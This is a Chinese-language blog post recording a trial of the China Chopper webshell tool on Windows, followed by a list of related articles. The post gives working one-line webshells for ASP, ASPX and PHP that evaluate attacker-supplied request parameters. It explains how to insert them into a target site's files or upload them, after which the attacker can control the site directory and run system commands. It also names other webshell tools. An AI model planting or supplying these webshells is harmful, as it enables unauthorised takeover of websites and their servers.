2018-11-08 中國菜刀小試記錄(windows環境)
一. 簡介:
往目標網站中加入一句話木馬,然後你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網站目錄並可執行一些web賬號所有許可權的系統命令,進入後滲透階段。
傳說中的官方網站:http://maicaidao.co/ 。下載的時候發現是2014年的版本。。。
測試完官方的中國菜刀後,從Cracer的Cracer安全工具包v7版中拿了一個相對較新的,但是發現百度上找到的菜刀都有後門,並且中國菜刀的這些一句話木馬很容易就被防毒軟體查殺了,所以推薦兩款更好的kali下的工具:webacoo、Weevely 。
二. 記錄:
asp的一句話是: <%eval request("xxx")%>
aspx的一句話是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句話是:<?php @eval($_POST['xxx']);?>
我們可以直接將這些語句插入到網站上的某個asp/aspx/php檔案上,或者直接建立一個新的檔案,在裡面寫入這些語句,然後把檔案上傳到網站上即可。
使用起來非常簡單,如下圖:
相關文章
- Windows環境下ELK簡單搭建記錄Windows
- Golang框架Beego在Windows環境下小試牛刀Golang框架Windows
- Windows配置Delve的測試環境Windows
- Windows 終端環境配置筆記Windows筆記
- 搭建rust開發環境-記錄Rust開發環境
- MAC上Flutter環境搭建記錄MacFlutter
- MacOS Monterey 配置 PHP 環境記錄MacPHP
- windows11 下搭建 Docker 開發環境記錄(少踩坑版)WindowsDocker開發環境
- windows的vscode中配置linux環境WindowsVSCodeLinux
- Windows 11 安裝wsl小記錄Windows
- PHP Windows環境PHPWindows
- Windows環境下的Nginx環境搭建WindowsNginx
- Windows 環境下 Python 環境安裝WindowsPython
- Xamarin 學習筆記 - 配置環境(Windows & iOS)筆記WindowsiOS
- 掘金小試,記錄使用方式
- Centos下Nodejs+npm環境-部署記錄CentOSNodeJSNPM
- Redis+Keepalived高可用環境部署記錄Redis
- 【記錄】WSL 下搭建前端開發環境前端開發環境
- Spark 環境問題記錄和解決方法Spark
- 記-Windows環境下Prometheus+alertmanager+windows_exporter+mtail監控部署WindowsPrometheusExportAI
- 中國菜刀使用(實戰正確姿勢)
- windows 配置JAVA環境WindowsJava
- Flutter環境搭建(Windows)FlutterWindows
- go windows 環境搭建GoWindows
- Windows配置java環境WindowsJava
- Anaconda與Python環境在Windows中的部署PythonWindows
- Windows系統中搭建python開發環境WindowsPython開發環境
- WLS中Linux與Windows間的環境共享LinuxWindows
- 配置開發環境、生成環境、測試環境開發環境
- 手把手教你搭建Windows環境微信小程式的本地測試伺服器Windows微信小程式伺服器
- ProxySQL Cluster 高可用叢集環境部署記錄SQL
- Docker環境編譯時的錯誤記錄Docker編譯
- MySQL 高可用架構 - MHA環境部署記錄MySql架構
- BearPi-HM Nano學習筆記(2)——HarmonyOS環境搭建[Windows篇]@對映與燒錄NaN筆記Windows
- 在linux環境下 開機掛載 windows server share目錄LinuxWindowsServer
- 彙編學習小記(一)-熟悉DEBUG環境
- Windows 下搭建 lnmp 環境WindowsLNMP
- Windows環境啟動RocketMQWindowsMQ